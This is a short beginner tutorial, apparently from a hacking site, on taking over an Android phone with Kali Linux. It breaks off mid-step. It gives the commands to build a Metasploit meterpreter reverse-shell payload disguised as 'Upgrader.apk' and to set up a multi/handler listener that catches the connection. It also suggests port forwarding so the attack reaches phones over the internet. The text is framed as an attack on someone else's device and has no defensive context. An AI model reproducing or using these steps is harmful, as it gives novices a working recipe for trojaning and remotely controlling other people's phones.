Direct DownloadLinkIn this Tutorial You will be guided How to Hack Android Using Kali. This a completely noob friendly tutorial . With Pics in each steps.All that u need is just Kali Linux installed in your PC and a droid to hackStep 1: Fire-Up Kali:*.Open a terminal, and make aTrojan.apk*.You can do this by typing :*.msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.4 R > /root/Upgrader.apk(replace LHOST with your own IP)*.You can also hack android onWAN i.e. throughInteretby using yourPublic/External IPin the LHOST and byport forwardingStep 2: Open Another Terminal:*.Open another terminal until the file is being produced.*.Load metasploit console, by typing :msfconsoleStep 3: Set-Up a Listener:*.After it loads(generally takes some time), load the multi-handler exploit by typing :use exploit/multi/handler*.Set up a (reverse) payload by typing :set payload android/meterpreter/reverse_tcp*.To set L host type :set LHOST 192.168.0.4(Even if you are hacking on WAN type your pr...